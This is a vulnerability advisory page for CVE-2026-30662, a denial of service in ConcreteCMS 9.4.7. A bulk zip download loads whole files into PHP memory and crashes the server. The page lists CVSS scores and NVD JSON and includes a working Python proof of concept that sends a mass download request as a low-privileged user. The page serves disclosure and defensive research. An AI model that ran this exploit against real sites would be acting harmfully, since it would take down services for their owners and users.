Security Vulnerability Report
中文
CVE-2026-30662 CVSS 6.5 MEDIUM

CVE-2026-30662

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-24 20:16:27
Source: [email protected]

Description

ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:concretecms:concrete_cms:9.4.7:*:*:*:*:*:*:* - VULNERABLE
ConcreteCMS v9.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: ConcreteCMS v9.4.7 - DoS via File Manager Bulk Download # Date: 2026-03-24 # Exploit Author: Analyst # Vendor Homepage: https://www.concretecms.com/ # Version: 9.4.7 target_url = "http://target-site.com/index.php/concrete/backend/file/download" session = requests.Session() # 1. Login as a low-privileged user login_payload = { "uName": "attacker", "uPassword": "password" } session.post("http://target-site.com/index.php/login/perform_login", data=login_payload) # 2. Select a large list of file IDs to trigger OOM # Assuming file IDs 1 to 100 are large files exploit_payload = { "fIDs[]": list(range(1, 101)), "download": "Download Selected" } try: print("Sending malicious bulk download request...") response = session.post(target_url, data=exploit_payload) if response.status_code == 500: print("[+] Server returned 500 Error - Potential DoS successful") else: print(f"[-] Server responded with status: {response.status_code}") except Exception as e: print(f"Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30662", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:34.457", "lastModified": "2026-03-24T20:16:27.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error."}, {"lang": "es", "value": "ConcreteCMS v9.4.7 contiene una vulnerabilidad de denegación de servicio (DoS) en el componente del Administrador de Archivos. El método 'download' en 'concrete/controllers/backend/file.php' gestiona incorrectamente la memoria al crear archivos zip. Utiliza 'ZipArchive::addFromString' combinado con 'file_get_contents', lo que carga el contenido completo de cada archivo seleccionado en la memoria PHP. Un atacante autenticado puede explotar esto solicitando una descarga masiva de archivos grandes, lo que desencadena una condición de Out-Of-Memory (OOM) que provoca la terminación del proceso PHP-FPM (SIGSEGV) y que el servidor web devuelva un error 500."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:concretecms:concrete_cms:9.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "EF06110B-22B0-44D9-951B-BBB115E0968D"}]}]}], "references": [{"url": "https://wang1rrr.github.io/2026/02/11/CVE-Report-ConcreteCMS-DoS/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.